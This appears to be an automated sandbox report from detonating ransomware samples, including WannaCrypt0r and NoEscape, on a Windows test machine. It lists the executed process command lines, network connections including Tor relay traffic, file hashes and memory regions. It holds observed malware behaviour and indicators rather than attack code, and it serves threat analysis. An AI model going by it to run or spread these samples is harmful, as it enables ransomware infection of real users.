"C:\Users\Admin\AppData\Local\Temp\is-7MLHM.tmp\MassiveInstaller.tmp" /SL5="$60284,10516965,1082880,C:\Users\Admin\Programs\Downloadly\MassiveInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /AllowStatusPage=false /ShowUI=false /DIR="C:\Users\Admin\Programs\Massive"

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im Massive.exe

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\System32\taskkill.exe" /f /im MassiveUI.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1964,17016562784917009708,445047318881724811,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6244 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe

"C:\Users\Admin\AppData\Local\Temp\Temp1_NoEscape.zip\NoEscape.exe"

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\@[email protected]

@[email protected]

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskdl.exe

taskdl.exe

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3980855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
NL 142.250.179.196:443 www.google.com udp
NL 142.250.179.196:443 www.google.com tcp
US 8.8.8.8:53 196.179.250.142.in-addr.arpa udp
NL 142.251.39.110:443 clients2.google.com udp
N/A 224.0.0.251:5353 udp
NL 142.251.39.110:443 clients2.google.com tcp
US 104.21.46.176:443 malwarewatch.org tcp
US 104.21.46.176:443 malwarewatch.org tcp
US 104.21.46.176:443 malwarewatch.org udp
US 104.16.124.175:443 unpkg.com tcp
US 172.64.207.38:443 use.fontawesome.com tcp
NL 172.217.168.238:443 www.youtube.com tcp
US 8.8.8.8:53 42.36.251.142.in-addr.arpa udp
NL 142.250.179.214:443 i.ytimg.com tcp
NL 142.250.179.214:443 i.ytimg.com tcp
NL 142.250.179.214:443 i.ytimg.com tcp
NL 142.250.179.214:443 i.ytimg.com tcp
NL 142.250.179.214:443 i.ytimg.com tcp
NL 142.250.179.214:443 i.ytimg.com tcp
NL 142.250.179.214:443 i.ytimg.com udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
NL 142.250.179.198:443 static.doubleclick.net tcp
NL 172.217.23.202:443 jnn-pa.googleapis.com tcp
NL 142.251.36.2:443 googleads.g.doubleclick.net udp
NL 142.250.179.193:443 yt3.ggpht.com tcp
NL 172.217.23.202:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 198.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 202.23.217.172.in-addr.arpa udp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.4:443 github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
NL 142.251.39.110:443 play.google.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 140.82.113.21:443 collector.github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
NL 142.250.179.163:443 beacons.gcp.gvt2.com tcp
NL 142.250.179.163:443 beacons.gcp.gvt2.com udp
NL 142.250.179.163:443 beacons.gcp.gvt2.com udp
DE 140.82.121.5:443 api.github.com tcp
NL 142.250.179.196:443 www.google.com udp
DE 140.82.121.4:443 github.com tcp
NL 142.250.179.163:443 beacons.gcp.gvt2.com udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:52038 tcp
DE 81.30.158.213:9001 tcp
DE 193.23.244.244:443 tcp
DE 193.23.244.244:443 tcp
FI 185.100.86.100:443 tcp
ES 82.223.21.74:9001 tcp
NL 194.109.206.212:443 tcp
DE 140.82.121.5:443 api.github.com tcp
US 69.162.139.9:9001 tcp
NL 194.109.206.212:443 tcp
US 154.35.175.225:443 tcp
FR 212.47.237.95:9001 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
DK 185.96.180.29:443 tcp
US 199.254.238.52:443 tcp
RO 176.126.252.12:8080 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
DE 131.188.40.189:443 tcp
DE 88.216.223.2:143 tcp
N/A 127.0.0.1:9050 tcp
GB 92.123.128.149:443 www.bing.com tcp
US 172.67.168.207:80 malwarewatch.org tcp
US 172.67.168.207:80 malwarewatch.org tcp
US 172.67.168.207:443 malwarewatch.org tcp
US 104.16.122.175:443 unpkg.com tcp
US 172.64.207.38:443 use.fontawesome.com tcp
NL 172.217.168.238:443 www.youtube.com tcp
US 8.8.8.8:53 175.122.16.104.in-addr.arpa udp
NL 172.217.168.238:443 www.youtube.com udp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com tcp
NL 172.217.168.214:443 i.ytimg.com udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
NL 142.251.36.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.250.179.198:443 static.doubleclick.net tcp
US 8.8.8.8:53 214.168.217.172.in-addr.arpa udp
NL 142.251.36.10:443 jnn-pa.googleapis.com tcp
NL 142.250.179.196:443 www.google.com tcp
NL 142.250.179.193:443 yt3.ggpht.com tcp
NL 142.251.36.10:443 jnn-pa.googleapis.com udp
DE 140.82.121.3:443 github.com tcp
DE 140.82.121.3:443 github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 140.82.114.21:443 collector.github.com tcp
US 140.82.114.21:443 collector.github.com tcp
US 185.199.110.154:443 github.githubassets.com tcp
US 140.82.114.21:443 collector.github.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp
DE 140.82.121.5:443 api.github.com tcp
US 140.82.114.21:443 collector.github.com tcp
N/A 127.0.0.1:9050 tcp
GB 108.156.46.93:443 api.joinmassive.com tcp
US 8.8.8.8:53 93.46.156.108.in-addr.arpa udp
US 8.8.8.8:53 downloads.joinmassive.com udp
GB 18.164.68.34:443 downloads.joinmassive.com tcp
US 8.8.8.8:53 178.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 34.68.164.18.in-addr.arpa udp
US 8.8.8.8:53 113.216.138.108.in-addr.arpa udp
US 8.8.8.8:53 12.178.204.143.in-addr.arpa udp
US 172.67.68.80:443 cdn.computewall.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
GB 108.156.46.93:443 api.joinmassive.com tcp
GB 108.156.46.93:443 api.joinmassive.com tcp
GB 108.156.46.93:443 api.joinmassive.com tcp
GB 18.164.68.34:443 downloads.joinmassive.com tcp
GB 18.164.68.34:443 downloads.joinmassive.com tcp
US 8.8.8.8:53 ocsp.r2m03.amazontrust.com udp
GB 143.204.67.183:80 ocsp.r2m03.amazontrust.com tcp
US 8.8.8.8:53 o428832.ingest.sentry.io udp
US 34.120.195.249:443 o428832.ingest.sentry.io tcp
US 8.8.8.8:53 183.67.204.143.in-addr.arpa udp
US 8.8.8.8:53 249.195.120.34.in-addr.arpa udp
GB 108.156.46.93:443 api.joinmassive.com tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.5:443 api.github.com tcp
US 8.8.8.8:53 api.segment.io udp
US 52.12.47.65:443 api.segment.io tcp
US 52.202.138.245:443 private-api.joinmassive.com tcp
US 8.8.8.8:53 245.138.202.52.in-addr.arpa udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
N/A 127.0.0.1:9050 tcp
N/A 127.0.0.1:9050 tcp

Files

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 a107623eda97f0e4d696c6c96f034477
SHA1 c4093131bd158a3f985298ac690dc9a42f641e3c
SHA256 63fe436eb6bc84aa57b6e37d3a4ac374ac2a573c3f13172c34f32e79dae1ec63
SHA512 917d66490a3e232ed50b643043666b43f87ede5d885383cf6a10a562a18b0ab6867f38f8e20f44b7696a0b374111aa7adaabe132c7be817e9d9cc0bc36f8be87

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 467961f085fb93d58eec81af6c185420
SHA1 6a57e9a0fb0b87380c5e8874e0fd2e5f43203682
SHA256 0b7b58cae67fa4ad232aa8fdca78ebdc371ef4ec74c08e34a78b867c9aea7152
SHA512 370d0fee2d21dd64136beef0e9c913dc1ee316aa0aeaadb17cab08480e24da9bbab76cab4fbfae5011bb5865822d21678458f1aec7582ce71b342abcab3d5370

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

MD5 ae1bccd6831ebfe5ad03b482ee266e4f
SHA1 01f4179f48f1af383b275d7ee338dd160b6f558a
SHA256 1b11047e738f76c94c9d15ee981ec46b286a54def1a7852ca1ade7f908988649
SHA512 baf7ff6747f30e542c254f46a9678b9dbf42312933962c391b79eca6fcb615e4ba9283c00f554d6021e594f18c087899bc9b5362c41c0d6f862bba7fb9f83038

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe5a51da.TMP

MD5 c73a390a125e252cbf9ffd395ca40d9f
SHA1 89ed8d1ce3b8e3e7e193e58b1ea079ad3ba695ea
SHA256 07bb04369a67c3906ad7ddbef5ca0654d767bbd1df0d9c6607abcc2f4e57d323
SHA512 c3e10445f88ae1cdff386466b86b47b5ecc52adbc75ecfee2b886492bf47fd61bc1a01a8ab1ee0748720a369c3b31911493ee774efd487ec52590593ac6637de

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 7395637569f726cf8c33c7353dd2f8c1
SHA1 77a2f9a4d14334621a9a78fc8151d899cd015c7b
SHA256 e2a1db8db6f759aa4aa56f7c8d61f1a4b1264133992eefcfdb55a1b6b525c2cf
SHA512 6bca17be53596a1b33c9a65b0bda32f11bba2b2633de9539c332e963c4f9dbec77592411b6e8d70e6d8ef21fe1bf3bb282197f07ba43e16b071531f4678f3226

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 b32d947b85139959ec570264b0b63bed
SHA1 75e2a013dfbc009b7e01837f3a051fc4f5445780
SHA256 443b7606847aaef4ca556c010314ce1870cf0bbc1a0e6323a89a59a27714e2ab
SHA512 4d4a4565ee6470062e94961603e1c1fa79935e15a77abaa8e6f472837a01a35dddbd0614720fc7a0c70c166184b86d2f8078ac60f976ac83117a225742150df0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\bad58dae-9ee4-4d6c-b64a-6cad8576ee4d.tmp

MD5 4985b566c6365ffc83810267317d6a4c
SHA1 0929ccd66a96944b73a6d40fbedaec39e05f2b28
SHA256 536a42e47833dd0d3c297dd0a3ec75c27bc14de902c6a180de47acd5abda0492
SHA512 4eea56435c2d710668be92374377912f755f02a27c73f0e82350e2c97c48f3810b7acdfc6eb52dd1781ddddca315b4fb899c9bec07f5a692b3eb82bd5a5346b8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 d5e741e6151b60b671cd2a480d74f2a9
SHA1 ee8904a88860cf3bc16630c7bdf7cd1162ae231a
SHA256 eea1f42dc2f1b2b7a65b89d51c28a6073f0ded1f27025762954e410df5ce9261
SHA512 6a3b676cb49b9bac799a297aaa4d594cca91b666ec435a5c0203de703ed28818cb3cedce2911bbaae436b6507cfe624a41db36a3137b9ddbdb83adbea11585c0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 8f152380fdbc30e0f53965331aa02aa7
SHA1 b210f6ba9efe7d3859f17a6eff0caf0542cc757d
SHA256 93c748197f84489e57d5b8754544703ae65b92e1129766915d40c4643652cead
SHA512 ffe61a2a5a0b7ea0d5451dcb8f6b2c40ab477ce6a9a7bfdde8ed30f6ffc80a6c8284c7d0ef9335a8f534dfc3d27d30efcc7e92d32ee254a80ef797bcc1b3dc54

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 80a86b795f7799421fef4fc8ebd80dfd
SHA1 c510bb60c68d780db57b5b8f9b8790fe7a1f11e0
SHA256 add9212effb290aeb55a1a85b515aa11424b8188c87d78e6ababfa12d877e2aa
SHA512 40834d6fb880dcbf49b7c111780c118a675a3618848facc431a102fcf6f2bb7a7d95aa3f8712718b7f039fca66a30abf494dd07440bd30f3be981dbdfb907588

C:\Users\Admin\Downloads\YouAreAnIdiot.zip

MD5 a7a51358ab9cdf1773b76bc2e25812d9
SHA1 9f3befe37f5fbe58bbb9476a811869c5410ee919
SHA256 817ae49d7329ea507f0a01bb8009b9698bbd2fbe5055c942536f73f4d1d2b612
SHA512 3adc88eec7f646e50be24d2322b146438350aad358b3939d6ec0cd700fa3e3c07f2b75c5cd5e0018721af8e2391b0f32138ab66369869aaaa055d9188b4aa38d

C:\Users\Admin\Downloads\YouAreAnIdiot.zip:Zone.Identifier

MD5 0f98a5550abe0fb880568b1480c96a1c
SHA1 d2ce9f7057b201d31f79f3aee2225d89f36be07d
SHA256 2dfb5f4b33e4cf8237b732c02b1f2b1192ffe4b83114bcf821f489bbf48c6aa1
SHA512 dbc1150d831950684ab37407defac0177b7583da0fe13ee8f8eeb65e8b05d23b357722246888189b4681b97507a4262ece96a1c458c4427a9a41d8ea8d11a2f6

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 d75b354d17cfa68fd17115aceb550284
SHA1 aef3bebc33a54e9145c2d1c2f30e0f4984cd4732
SHA256 3432e91abed8b31c61578cd199dac517ee55fddeeb49049163a1028bb40c2178
SHA512 b60eb6b711e082a09cc88ee4ca40258e9a0ba78aef664df97296596dd8ac0143f566a3d7c1eb1c3f89da6b45db07b6f4b88e8b7df36d3094b4979c8d87a69340

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2372d0aebea8c23a9aa68ade26cf3410
SHA1 34065a70f02b9b959e71bbdc3724e15f95853aee
SHA256 6391e398fc50106e10ba07aa98e5e59dfa13797ea35f91ae7fe5bb588938daee
SHA512 6ffc00486aecf769c8a43af53bc8e9c942282de244b3cd66be72b2374d843fc6de3f2b135c90acd643e918f96bcae654fc0db471bcd8a2d6d99d590f9785218e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 bb993e826c55bdd9de00f752e12a9a9e
SHA1 adf4f103fc938c264573c9f6c679a43cabe2087e
SHA256 2209666ac99e64f5beffa41b300ceb762e4322e104e80469259362ef35c8d6d0
SHA512 128b360f70247fe544857b3c35f2cdf8b5ac7d70f2cb8936bf7857a7b2815ee89faa5035e7ec2dbd2e89f31ffe637bbef411cfa4d32497675b8c5f792156ce27

C:\Users\Admin\Downloads\YouAreAnIdiot (1).zip:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 b16270719f446297fef95a34a4a8f7fb
SHA1 bc59a8850362fcd98f7e400d1f9c12dcc7dbfa4a
SHA256 216d2438afe42c47add9f4142d61dbd4a5b8d070d057a191d0aafa5f499aded2
SHA512 3f45550c3735969e7f9e963bc557ee6a3fffb1f98b7ecf437a83e8575cac2162cb1028caec814c3a5a3c457b61ded7f0e2f83216a4ac4f945ac7f3494ce693ac

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 249c9708b6a3402f36849303816d9526
SHA1 620616d11e48e24960e7f67a89947d28b384e71b
SHA256 637abd4c74ab6129a288d4f0e9f9498d91cac717299363782e9dab2f278df32a
SHA512 759e8aa7e3aa1a922a608ad97587d535f3c1e8906bcb3109eaf0ddd8cf97c6744c9569009e39426fef3e29434fc0a9b0853ee6e5c75bcd63e23da2e0ed74c744

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 6aed8b2a15d0834ee88d6d26695df58d
SHA1 a1b8760b7334431fa163a854950b072faefb5bb4
SHA256 ad5b6785d2bd1f5f7a32952db9a9be4e9b8f79ac0ed848ba71e1e3ba95650c87
SHA512 5c7bfc421f6a2e907f1db4f4951b63ba9a355753cf6d38017d621f032149594ae054c8a53d959be790c5780e5bf684dee1944d6f676d01e7b196d15f91942963

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 0499e7c4553d2e0f581e73ef374d97be
SHA1 ac29d220597e6d36f5dac2b59a4359d7a8d3c7e9
SHA256 bf09220b878cbd6b187e1225bcd39ec094e24b48bab63118b6f3b7d7d2a6500e
SHA512 95ca9a37c9b8cab8299b78b17614260075621f3c9f2a1a8d88f6c40d42849bbef7c4d36f77fdb08a8403a25c6450f3d4b204910b24386c128c3f3836a6b48b22

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

MD5 8e0519f7055d4ee05e74d34d447d11da
SHA1 6ba6da1e17b5d5d3b0328ce46191e7241b6da135
SHA256 a51b7013201f666280136d8d2672a0c6ad603de01459715e5566133c84279073
SHA512 e7d7f310844e2b699684ffc19c3459d2198df82079788e0d85eeac803d783cc044a3b9fadf7cf3eb1c99d0f3255c1ed9bb05f1aa5281e78e039955ccdd08a363

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe5b4a34.TMP

MD5 38e5177c76e7cb381d3f748bdf619ded
SHA1 71616b68deeb2a2fb1b125368bcc87c5775da48b
SHA256 7cb8b5c79093ab54dfa585ace965c35d691b9418d2f4f969db02a8facc455c5d
SHA512 6c875704cb9da31706a8c1e4447c3e25b4553f541d2461fe0ce00669dbf8262037e888f2e2952e545fba6f5cbb502112a032ed60b9f35c847796739aaffac0a3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 68087cca5989fd94ea1435e5f5fa5d3e
SHA1 ca16c399ba41b25fab5017279b48e7afdc692f90
SHA256 02ed6bd7a852aba6b0368d7b2203f1b96f655d7bc7e1a573cd686edd59d2ad14
SHA512 f0b1a1acf45ce8abbc911c15611f31323e667f751fd27dca3400c74a714854441e1505577ba4bfa26e6ddafcd79a330cdbbf32749620d9c665a5bf9d2a4df74f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

MD5 0876a1875a10be837ebf05700fc5922f
SHA1 7924c59dd87e44f2dd6235e674f0ad4a839fdef4
SHA256 9ba0c427f74d4917625f3657b06e65e652d733e13db0c4bac712898a677322a3
SHA512 c2ab2e34f3a864b6218e86c542c7bdc1275eb97b3ba646d7b1bb750b8a38a8010199866e14a06eac128aae33fea8d6f1884c7a0dd49ac1bc9ed9cbef97094213

memory/484-620-0x00000000007A0000-0x0000000000812000-memory.dmp

memory/484-622-0x0000000005340000-0x00000000053DC000-memory.dmp

memory/484-621-0x0000000074BA0000-0x0000000075351000-memory.dmp

memory/484-623-0x0000000005990000-0x0000000005F36000-memory.dmp

memory/484-624-0x00000000053E0000-0x0000000005472000-memory.dmp

memory/484-625-0x0000000005570000-0x0000000005580000-memory.dmp

memory/484-626-0x00000000052C0000-0x00000000052CA000-memory.dmp

memory/484-627-0x0000000005580000-0x00000000055D6000-memory.dmp

memory/484-628-0x0000000005770000-0x000000000577A000-memory.dmp

memory/484-629-0x0000000074BA0000-0x0000000075351000-memory.dmp

memory/4932-630-0x0000000074C40000-0x00000000753F1000-memory.dmp

memory/4932-631-0x0000000005B20000-0x0000000005B30000-memory.dmp

memory/4932-632-0x0000000074C40000-0x00000000753F1000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a3674be75fd36699cf2c566223ed3ad1
SHA1 ef00736e9bf264b37614e44d14ffcde8c31ecd4c
SHA256 9f59e997acdaabfc617f5a167e9e9cad224129d1706cad5d6118434ebf7e1016
SHA512 caf33e79d9cf61f96dfc709aaeb9bc9bbb250b072d138d91f5863765c98838f598a559c079a330f976a37d1430543040e100d5a3fb42abd7af44ba0ec852ad62

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 e602457498afec36a29fa53329d6b932
SHA1 2e89bde308d0c75178ad272e1b1437ec9bc94a9e
SHA256 a3a9b9247034e39b64ee0fc89d0a267e2b649458693b7a67d0a23581c2e1f170
SHA512 74951d4d3f47a819f3a604bf6ac873aca4f80e6d1babbbb6b77c735a31564ef09c427df12468f17cd762c1087b1cc39e0a24ea553b6b4121b89e64b65559d921

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 461bb56ddc222fda42b7f434dceec1a8
SHA1 9a0b05a57112407c2fdb6a97e1ff0f7906340290
SHA256 7e4a326427a0feb131080626cdfb98cbf7b0dc9301c066f551a0b5b8bf981ec6
SHA512 5b2604409aab30c5b706e10efead5f407e6f8f4115350c0792953341e1451c1d26d4055b9cbbcfe9877b8a58552f8b0aaa2d80930a3f180d909ec2cf8edaff7b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 10fddd1f696782aaa0e9155839547297
SHA1 1ab7f934a636edb07e83a0e2000c56bfdb3eff06
SHA256 b9661c39b47f490c2dc459d041e9002e3f48a5ec5e4a202bf1f9ccfb3101a6a1
SHA512 0f8f1d27d63a0fc01a7c94c6b96275c1670f50838076020434d7e3fb84ceb28e39d16aecd52b1ca4ec5a8d47d0718e29217b0a8f246348d86a941b09176e0591

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 12d6b88106d3ddabf50d9fd45f853ed6
SHA1 19b93ea4a328715601d310d5b1946724de1f29e9
SHA256 c00b2214701ed3b4c4ac0a89e8297de318bab33a7e052c190c7f4895f13dfdb2
SHA512 7c03f91f973771fc373a901fdf50ca32120716b320a3a1f1aaa39601f26e43b735ea985d0bfb66f10109cf5f4c5ac42e23c34e32ca187c61f16aa734cfd1754d

C:\Users\Admin\Downloads\WannaCrypt0r.zip.crdownload

MD5 e58fdd8b0ce47bcb8ffd89f4499d186d
SHA1 b7e2334ac6e1ad75e3744661bb590a2d1da98b03
SHA256 283f40e9d550833bec101a24fd6fd6fbd9937ed32a51392e818ffff662a1d30a
SHA512 95b6567b373efa6aec6a9bfd7af70ded86f8c72d3e8ba75f756024817815b830f54d18143b0be6de335dd0ca0afe722f88a4684663be5a84946bd30343d43a8c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 3144c1c489e762c583b152aa9d9e2c2c
SHA1 6f6dde5334bbe1721f0ddc8d5cd153a5251cc48b
SHA256 faf546e41e594cebc9a017357872ac27765c4ecf53ab51546526b9beff513c4b
SHA512 2c7a8444a7f7cc42736ca7a84f1c77d7362e55d9e31b643e137f537ac46757600fb98f7ecf98e99285e20b5bb9bc4b60e2954f4b0a249c92e705ccb26772de0c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\ca2a62fb-34e7-45cc-99c0-4fb65adc9dc0.tmp

MD5 27cc1bc2bcb3cbe69c86cd72a3554f25
SHA1 0dbab94c7356766a03f257ac0a5b354e7d1aa855
SHA256 fd607e7176d337e5a3301e383d2be5e63a1a22d1a6842bb2a844116c43c1d600
SHA512 30d24097de658606d235d574f00358abb044942a8f5607306fa73991b7d412ee899803f2f6ee6ade9bbf00338751eaad798a00cccb06db410aa5de0efa1eaf08

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

MD5 6096aa73dde2cd9fd0bf5a05db4232a1
SHA1 20162437a1d53704fe97c8be917d3230f067054d
SHA256 45a2b23864047f7c526df271524e6b1cb74bc5c8bed7bcdfdc24c7cb78fb052c
SHA512 cbc5063c6008922db78c08416e8da2e2b3022932855371d36c8153fc54896839b8ed94aa6f9029cda02c31c0bf365b56da243cbd3877284c5be06171130c2c97

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

memory/4624-766-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r.zip\taskse.exe

MD5 8495400f199ac77853c53b5a3f278f3e
SHA1 be5d6279874da315e3080b06083757aad9b32c23
SHA256 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
